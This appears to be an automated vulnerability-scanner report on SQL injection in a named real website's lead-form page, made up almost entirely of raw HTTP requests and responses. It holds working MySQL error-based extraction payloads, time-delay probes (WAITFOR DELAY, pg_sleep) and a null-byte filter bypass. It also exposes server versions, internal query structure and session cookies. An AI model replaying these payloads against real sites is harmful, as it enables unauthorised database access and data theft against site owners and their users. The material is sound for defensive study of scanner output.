The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27' HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response 1
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:11 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=7r3ieaak6uiung239p0f4h2a16; path=/ Content-Length: 4094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ,concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27'' HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response 2
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:11 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=97pha4kj7pequ350n24jf7eog6; path=/ Content-Length: 3917 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:30:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:30:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The lastname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the lastname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:19 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=2gitcbcuk01mb5lnavbmgr6qg4; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
1.375. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/hins00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&1'=1 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response 1
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:21 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=bo6cnvdc2skusokcpnk93k2957; path=/ Content-Length: 4126 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... cat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(se' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&1''=1 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response 2
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=f0kmuii3lqgn3vrjhojodr5qm6; path=/ Content-Length: 3949 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
1.376. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.insideup.com
Path:
/ppc/leadflow/hins00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2/1'B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=i5fmam6r8e1k86dla0o9j2qf36; path=/ Content-Length: 4126 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... cat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))%2/1'B'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''B'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+' at line 5
1.377. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/hins00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:23:17 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=sdt7f3v2sfgr6f5ncrijsch801; path=/ Content-Length: 2262 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... roup_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc=iupsc&1.'=1' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc=iupsc&1.'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc=iupsc' at line 5
The phone parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the phone parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=c7e0rfuudhu3vm4ei04021req4; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:31:06 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 